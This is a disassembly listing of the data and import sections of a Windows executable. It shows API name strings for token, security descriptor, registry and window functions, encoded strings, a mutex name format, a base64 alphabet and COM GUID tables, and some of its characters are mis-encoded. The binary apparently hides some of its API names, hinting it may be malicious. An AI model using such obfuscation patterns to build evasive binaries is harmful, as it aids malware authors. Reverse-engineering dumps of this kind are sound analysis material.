byte_44E7F9 db 2 dup(0), 7Bh ; DATA XREF: sub_43B3E1+14B�o
aSetsecuritydes db 'SetSecurityDescriptorOwner',0
byte_44E817 db 0 ; DATA XREF: sub_43B3E1+12F�o
db 0
db 0F6h, 53h, 65h
aTsecuritydescr db 'tSecurityDescriptorDacl',0
unk_44E834 db 0 ; DATA XREF: sub_43B3E1+113�o
align 2
aDinitializesec db 'DInitializeSecurityDescriptor',0
dword_44E854 dd 41020000h, 73756A64h, 6B6F5474h, 72506E65h, 6C697669h
; DATA XREF: sub_43B3E1+F7�o
dd 73656765h
db 0
byte_44E86D db 2 dup(0), 46h ; DATA XREF: sub_43B3E1+DB�o
aGettokeninform db 'GetTokenInformation',0
dword_44E884 dd 4C110000h, 756B6F6Fh, 69725070h, 656C6976h, 61566567h
; DATA XREF: sub_43B3E1+BF�o
dd 4165756Ch
db 0
byte_44E89D db 2 dup(0), 8Ch ; DATA XREF: sub_43B3E1+A3�o
aOpenprocesstok db 'OpenProcessToken',0
byte_44E8B1 db 2 dup(0), 7Ah ; DATA XREF: sub_43B3E1+87�o
aGetusernamea db 'GetUserNameA',0
byte_44E8C1 db 2 dup(0), 3 ; DATA XREF: sub_43B3E1+6B�o
aRegclosekey_0 db 'RegCloseKey',0
dword_44E8D0 dd 527F0000h, 75516765h, 56797265h, 65756C61h, 417845h
; DATA XREF: sub_43B3E1+4F�o
dword_44E8E4 dd 52EB0000h, 704F6765h, 654B6E65h, 41784579h
; DATA XREF: sub_43B3E1:loc_43B414�o
db 0
byte_44E8F5 db 0Ch, 0, 3Ah ; DATA XREF: sub_43B3E1+1C�o
dd 5B4C5E5Bh, 809534Ah, 56565E14h
db 0
byte_44E905 db 2 dup(0), 28h ; DATA XREF: sub_43B3E1+1�o
aAdvapi32_dll_0 db 'advapi32.dll',0
byte_44E915 db 2 dup(0), 6Bh ; DATA XREF: sub_43B380+33�o
db 5Ch, 0
word_44E91A dw 0 ; DATA XREF: sub_43AFA1+2EF�o
aEnumdesktopwin db '½EnumDesktopWindows',0
dword_44E930 dd 468D0000h, 57646E69h, 6F646E69h, 41784577h db 0
byte_44E941 db 2 dup(0), 6Dh ; DATA XREF: sub_43AFA1+2B7�o
aTranslatemessa db 'TranslateMessage',0
byte_44E955 db 2 dup(0), 8 ; DATA XREF: sub_43AFA1+29B�o
aShowwindow db 'ShowWindow',0
byte_44E963 db 0 ; DATA XREF: sub_43AFA1+27F�o
dd 65534500h, 6E695774h, 54776F64h, 41747865h
db 0
byte_44E975 db 2 dup(0), 30h ; DATA XREF: sub_43AFA1+263�o
aSetwindowlonga db 'SetWindowLongA',0
byte_44E987 db 0 ; DATA XREF: sub_43AFA1+247�o
dd 6553A100h, 6D695474h
db 65h, 72h, 0
byte_44E993 db 0 ; DATA XREF: sub_43AFA1+22B�o
dd 65536800h, 636F4674h
db 75h, 73h, 0
byte_44E99F db 0 ; DATA XREF: sub_43AFA1+20F�o
dd 6553B900h, 654D646Eh, 67617373h
db 65h, 41h, 0
byte_44E9AF db 0 ; DATA XREF: sub_43AFA1+1F3�o
dd 6552E300h, 74736967h, 6C437265h, 41737361h
db 0
byte_44E9C1 db 2 dup(0), 0A6h ; DATA XREF: sub_43AFA1+1D7�o
aMovewindow db 'MoveWindow',0
byte_44E9CF db 0 ; DATA XREF: sub_43AFA1+1BB�o
dd 654DC300h, 67617373h, 786F4265h
db 41h, 0
word_44E9DE dw 0 ; DATA XREF: sub_43AFA1+19F�o
aCloadicona db 'CLoadIconA',0
byte_44E9EB db 0 ; DATA XREF: sub_43AFA1+183�o
dd 6F4CB700h, 75436461h, 726F7372h
db 41h, 0
word_44E9FA dw 0 ; DATA XREF: sub_43AFA1+167�o
aCgetwindowtext db '—GetWindowTextA',0
dword_44EA0C dd 47BF0000h, 69577465h, 776F646Eh, 74636552h db 0
byte_44EA1D db 2 dup(0), 0Ch ; DATA XREF: sub_43AFA1+12F�o
aGetwindowlonga db 'GetWindowLongA',0
byte_44EA2F db 0 ; DATA XREF: sub_43AFA1+113�o
dd 6547FA00h, 6E695774h, 776F64h
dword_44EA3C dd 47130000h, 654D7465h, 67617373h db 65h, 41h, 0
byte_44EA4B db 0 ; DATA XREF: sub_43AFA1+DB�o
dd 6547BF00h, 726F4674h, 6F726765h, 57646E75h, 6F646E69h
db 77h, 0
word_44EA62 dw 0 ; DATA XREF: sub_43AFA1+BF�o
aXgetclassnamea db 'xGetClassNameA',0
byte_44EA73 db 0 ; DATA XREF: sub_43AFA1+A3�o
dd 6944A600h, 74617073h, 654D6863h, 67617373h
db 65h, 41h, 0
byte_44EA87 db 0 ; DATA XREF: sub_43AFA1+87�o
dd 6544AB00h, 6F727473h, 6E695779h, 776F64h
dword_44EA98 dd 44E00000h, 69576665h, 776F646Eh, 636F7250h db 41h, 0
word_44EAAA dw 0 ; DATA XREF: sub_43AFA1+4F�o
dd 6572431Fh, 57657461h, 6F646E69h, 41784577h
db 0
byte_44EABD db 2 dup(0), 29h ; DATA XREF: sub_43AFA1:loc_43AFD4�o
aCallwindowproc db 'CallWindowProcA',0
asc_44EAD0 db 0Ah,0 ; DATA XREF: sub_43AFA1+1C�o
aVSrm db '¢×ÑÇБŒÆÎÎ',0
word_44EADE dw 0 ; DATA XREF: sub_43AFA1+1�o
a1user32_dll db '1user32.dll',0
dword_44EAEC dd 47A10000h, 74537465h, 4F6B636Fh, 63656A62h db 74h, 0
word_44EAFE dw 0 ; DATA XREF: sub_43AD9A:loc_43ADCD�o
aCreatefonta db 'ÞCreateFontA',0
asc_44EB0D db 9,0 ; DATA XREF: sub_43AD9A+1C�o
aSjeiEnn db 'ᆅˆÒÓÏ…',0
word_44EB1A dw 0 ; DATA XREF: sub_43AD9A+1�o
aXgdi32_dll db 'xgdi32.dll',0
byte_44EB27 db 5 ; DATA XREF: sub_43A8A3+245�o
dd 4D1B3E00h, 4D1B62h
dword_44EB30 dd 8FAA0005h, 0D98FF6D9h db 0
byte_44EB39 db 4, 0, 42h ; DATA XREF: sub_43A8A3+F�o
dd 681E3167h
db 0
byte_44EB41 db 11h, 0, 86h ; DATA XREF: sub_43A6D4+24�o
dd 0E3F2E8CFh, 0F2E3E8F4h, 0F6FEC3A6h, 0E3F4E9EAh
db 0F4h, 0
word_44EB56 dw 0 ; DATA XREF: sub_43A39F+1E0�o
aIkkqVx db 'ëkkq-vx',0
dword_44EB60 dd 6BA10000h, 762D716Bh db 78h, 0
word_44EB6A dw 0 ; DATA XREF: sub_43A39F+15F�o
aGkkqVx db 'gkkq-vx',0
dword_44EB74 dd 6B660000h, 762D716Bh db 78h, 0
word_44EB7E dw 0 ; DATA XREF: sub_43A39F+DD�o
aS_mtxU_0 db 'Å%s_mtx%u',0
word_44EB8A dw 0 ; DATA XREF: sub_43A39F+AB�o
aKkqVx db 'Ìkkq-vx',0
dword_44EB94 dd 25670000h, 746D5F73h db 78h, 31h, 0
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
; DATA XREF: .data:off_44D27C�o
db '://',0
dword_44EBE4 dd 9BA05972h, 11CFF6A8h, 0A00042A4h, 398F0AC9hdword_44EBF4 dd 0FE4106E0h, 11D0399Ah, 0A0008CA4h, 398F0AC9h ; sub_43B947+1E9�o ...
dword_44EC04 dd 34A715A0h, 11D06587h, 20004A92h, 4DACC7AFh
; DATA XREF: sub_43A324:loc_43A370�o
; sub_43AE0A+D7�o ...
dword_44EC14 dd 3050F25Bh, 11CF98B5h, 0AA0082BBh, 0BCEBD00h
; DATA XREF: sub_43B5BD:loc_43B609�o
dword_44EC24 dd 0B196B284h, 101ABAB4h, 0AA009CB6h, 71D3400hdword_44EC34 dd 20400h, 0 ; sub_43B5BD:loc_43B5E9�o ...
dd 0C0h, 46000000h
dword_44EC44 dd 332C4425h, 11D026CBh, 0C00083B4h, 1901D94Fh ; sub_43E8B9+CE�o ...
dword_44EC54 dd 3050F21Fh, 11CF98B5h, 0AA0082BBh, 0BCEBD00h ; sub_4435CB+68�o
dword_44EC64 dd 3050F1FFh, 11CF98B5h, 0AA0082BBh, 0BCEBD00h ; sub_441138+A85�o ...
dword_44EC74 dd 3050F1F7h, 11CF98B5h, 0AA0082BBh, 0BCEBD00hdword_44EC84 dd 3050F240h, 11CF98B5h, 0AA0082BBh, 0BCEBD00hdword_44EC94 dd 332C4427h, 11D026CBh, 0C00083B4h, 1901D94Fhdword_44ECA4 dd 7BF80981h, 101ABF32h, 0AA00BB8Bh, 0AB0C3000hdword_44ECB4 dd 85CB6900h, 11CF4D95h, 80000C96h, 85EEF4C7hdword_44ECC4 dd 2 dup(0) ; sub_43B5BD+C�o ...
dd 0C0h, 46000000h
dword_44ECD4 dd 0D30C1661h, 11D0CDAFh, 0C0003E8Ah, 6EE2C94Fh ; sub_43B947+111�o ...
dword_44ECE4 dd 10h dup(0) ; sub_444F64:loc_444F7E�o ...
dword_44ED24 dd 0 ; sub_444F08:loc_444F4A�o ...
dd 0Fh dup(0)
dword_44ED64 dd 0 ; sub_44506D+825�r
dword_44ED68 dd 0 ; sub_44506D+82C�r
dword_44ED6C dd 0 ; sub_44506D+834�r
dword_44ED70 dd 0 ; sub_44506D+83C�r
align 100h
_data ends
; Section 7. (virtual address 0004F000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0004EE00
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 44F000h
dd 2Bh dup(0)
dword_44F0AC dd 0 dword_44F0B0 dd 0 dword_44F0B4 dd 0 align 10h
dword_44F0C0 dd 0 dword_44F0C4 dd 0 dword_44F0C8 dd 0 dword_44F0CC dd 0 dword_44F0D0 dd 0 dword_44F0D4 dd 0 dword_44F0D8 dd 0 dword_44F0DC dd 0 align 1000h
_idata2 ends
end start